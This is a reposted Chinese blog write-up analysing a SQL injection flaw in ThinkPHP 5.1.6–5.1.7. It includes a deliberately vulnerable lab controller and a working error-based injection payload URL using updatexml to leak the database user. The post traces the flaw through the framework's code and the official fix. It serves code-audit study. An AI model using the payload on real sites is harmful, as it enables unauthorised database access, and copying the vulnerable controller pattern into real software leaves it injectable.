首页 / PHP / Thinkphp 5.1.7 SQL注入漏洞

Thinkphp 5.1.7 SQL注入漏洞

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了Thinkphp 5.1.7 SQL注入漏洞,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含2823字,纯文字阅读大概需要5分钟

内容图文

0x00 前言

依旧是和上篇文章审计思路一致,越来越觉得代审积累经验很重要了。。还好自己没有头铁学了学php漏洞就头铁去审,哪怕仅仅是这几篇文章这几篇文章学会了debug,学会了看Github的commit记录进行漏洞定位。代审真香啊,越审越好玩。

环境

本次漏洞存在于?Mysql?类的?parseArrayData?方法中由于程序没有对数据进行很好的过滤,将数据拼接进?SQL?语句,导致?SQL注入漏洞?的产生。漏洞影响版本:?5.1.6<=ThinkPHP<=5.1.7?(非最新的?5.1.8?版本也可利用)。

composer create-project topthink/think=5.1.7 tp5.1.7
 composer.json文件:
 "require": {
        "php": ">=5.6.0",
        "topthink/framework": "5.1.7"
    },
    
    更新:执行composer update

接下来设置漏洞点和配置数据库

将?application/index/controller/Index.php?文件代码设置如下:

<?php
namespace?app\index\controller;
class?Index
{
????public?function?index()
????{
????????$username?=?request()->get(‘username/a‘);
????????db(‘users‘)->where([‘id‘?=>?1])->update([‘username‘?=>?$username]);
????????return?‘Update?success‘;
????}
}

创建数据库信息如下:

create database tpdemo;
use tpdemo;
create table users(
	id int primary key auto_increment,
	username varchar(50) not null
);
insert into users(id,username) values(1,‘wtz‘);

在?config/database.php?文件中配置数据库相关信息

开启?config/app.php?中的?app_debug?和?app_trace

漏洞分析

先看github上的版本更新
Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

直接删除了default语句块,并直接删除了parseArrayData方法。
payload:

http://127.0.0.1:88/tp517/public/index.php/index/index?username[0]=point&username[1]=1&username[2]=updatexml(1,concat(0x7,user(),0x7e),1)^&username[3]=0

Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

这里获取一个username数组get变量,传给$username,然后作为字段‘username‘的值,插入users表。
通过查看调用堆栈,我们发现了我们sql语句执行点和调用了update

Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

ps:Query?类的?update?方法,该方法调用了?Connection?类的?update?方法,该方法又调用了?$this->builder?的?insert?方法,这里的?$this->builder?为?\think\db\builder\Mysql?类,该类继承于?Builder?类
我们进入

Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

可以看到此次漏洞就是因为调用了update导致的sql注入
我们继续看修复删除的一个方法:

parseArrayData
Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

这里直接返回了result

Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

这里data值给了列表
Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

这里也就是我们payload第一个是point原因,直接将$value(即$data[1])、$data[2]、$data[3]拼接到了返回值$result中

最后返回result
这一步返回的result进入了哪里呢?我们回去看

Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

可以看到这里参数已经得到我们可控且想要的了,我们需要一个语句拼接点,执行点开始就说了。找拼接点,哪里把他拼接到了update中:
找了一会发现还是开始提到的地方:
Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

和之前的?insert?注入一样,用?str_replace?将变量填充到?SQL?语句中,最终执行,导致?SQL注入漏洞?。

漏洞修复

官方直接将?parseArrayData?方法删除了。
Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

总结

debug是真好用啊
最后放一张七月火师傅的图
Thinkphp 5.1.7 SQL注入漏洞 - 文章图片

参考

https://mochazz.github.io/2019/03/21/ThinkPHP5漏洞分析之SQL注入2/#攻击总结

Thinkphp 5.1.7 SQL注入漏洞

标签:connect   删除   影响   前言   sql注入   strong   return   原因   uil   

本文系统来源:https://www.cnblogs.com/wangtanzhi/p/12729021.html

内容总结

以上是互联网集市为您收集整理的Thinkphp 5.1.7 SQL注入漏洞全部内容,希望文章能够帮你解决Thinkphp 5.1.7 SQL注入漏洞所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接:https://qyyshop.com/info/521828.html

来源:【匿名】